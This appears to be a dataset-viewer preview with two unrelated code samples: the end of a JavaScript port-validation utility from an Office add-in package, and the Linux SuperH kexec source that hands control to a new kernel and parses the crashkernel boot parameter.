function randomPortNumber() {
    // Two random bytes interpreted as an unsigned 16-bit little-endian integer.
    return crypto.randomBytes(2).readUInt16LE(0);
}
/**
 * Throw an error if the port is not a valid number.
 * @param port port number
 * @throws Error if port is not an integer from 0 to 65535.
 */
function validatePort(port) {
    // Fix: also reject NaN and non-integer numbers (e.g. 3.5), which the
    // previous typeof-only check let through to the OS-level calls.
    if ((typeof port !== "number") || !Number.isInteger(port) || (port < 0) || (port > 65535)) {
        throw new office_addin_usage_data_1.ExpectedError("Port should be a number from 0 to 65535.");
    }
}
//# sourceMappingURL=port.js.map |
/*
* machine_kexec.c - handle transition of Linux booting another kernel
* Copyright (C) 2002-2003 Eric Biederman <[email protected]>
*
* GameCube/ppc32 port Copyright (C) 2004 Albert Herranz
* LANDISK/sh4 supported by kogiidena
*
* This source code is licensed under the GNU General Public License,
* Version 2. See the file COPYING for more details.
*/
#include <linux/mm.h>
#include <linux/kexec.h>
#include <linux/delay.h>
#include <linux/reboot.h>
#include <asm/pgtable.h>
#include <asm/pgalloc.h>
#include <asm/mmu_context.h>
#include <asm/io.h>
#include <asm/cacheflush.h>
typedef NORET_TYPE void (*relocate_new_kernel_t)(
unsigned long indirection_page,
unsigned long reboot_code_buffer,
unsigned long start_address,
unsigned long vbr_reg) ATTRIB_NORET;
extern const unsigned char relocate_new_kernel[];
extern const unsigned int relocate_new_kernel_size;
extern void *gdb_vbr_vector;
/* Nothing to quiesce on this platform before switching kernels. */
void machine_shutdown(void)
{
}

/* Called on panic before entering the crash kernel; no state saved here. */
void machine_crash_shutdown(struct pt_regs *regs)
{
}

/*
 * Do whatever setup is needed on image and the
 * reboot code buffer to allow us to avoid allocations
 * later.
 */
int machine_kexec_prepare(struct kimage *image)
{
	return 0;
}

void machine_kexec_cleanup(struct kimage *image)
{
}
/* Dump each segment's destination range and the entry point to the log. */
static void kexec_info(struct kimage *image)
{
	int i;

	printk("kexec information\n");
	for (i = 0; i < image->nr_segments; i++) {
		printk(" segment[%d]: 0x%08x - 0x%08x (0x%08x)\n",
		       i,
		       (unsigned int)image->segment[i].mem,
		       (unsigned int)image->segment[i].mem +
		       image->segment[i].memsz,
		       (unsigned int)image->segment[i].memsz);
	}
	printk(" start : 0x%08x\n\n", (unsigned int)image->start);
}
/*
 * Do not allocate memory (or fail in any way) in machine_kexec().
 * We are past the point of no return, committed to rebooting now.
 */
NORET_TYPE void machine_kexec(struct kimage *image)
{
	unsigned long page_list;
	unsigned long reboot_code_buffer;
	unsigned long vbr_reg;
	relocate_new_kernel_t rnk;

#if defined(CONFIG_SH_STANDARD_BIOS)
	/* Keep the BIOS-provided vector table usable across the jump. */
	vbr_reg = ((unsigned long )gdb_vbr_vector) - 0x100;
#else
	vbr_reg = 0x80000000; // dummy
#endif

	/* Interrupts aren't acceptable while we reboot */
	local_irq_disable();

	page_list = image->head;

	/* we need both effective and real address here */
	reboot_code_buffer =
		(unsigned long)page_address(image->control_code_page);

	/* copy our kernel relocation code to the control code page */
	memcpy((void *)reboot_code_buffer, relocate_new_kernel,
	       relocate_new_kernel_size);

	kexec_info(image);
	/* Make the copied trampoline visible before jumping into it. */
	flush_cache_all();

	/* now call it */
	rnk = (relocate_new_kernel_t) reboot_code_buffer;
	(*rnk)(page_list, reboot_code_buffer, image->start, vbr_reg);
}
/* crashkernel=size@addr specifies the location to reserve for
 * a crash kernel. By reserving this memory we guarantee
 * that linux never sets it up as a DMA target.
 * Useful for holding code to do something appropriate
 * after a kernel panic.
 */
static int __init parse_crashkernel(char *arg)
{
	unsigned long size, base;

	/* memparse handles k/m/g suffixes and advances arg past the number. */
	size = memparse(arg, &arg);
	if (*arg == '@') {
		base = memparse(arg+1, &arg);
		/* FIXME: Do I want a sanity check
		 * to validate the memory range?
		 */
		crashk_res.start = base;
		crashk_res.end = base + size - 1;
	}
	return 0;
}
early_param("crashkernel", parse_crashkernel);
|
End of preview. Expand
in Dataset Viewer.
- Downloads last month
- 61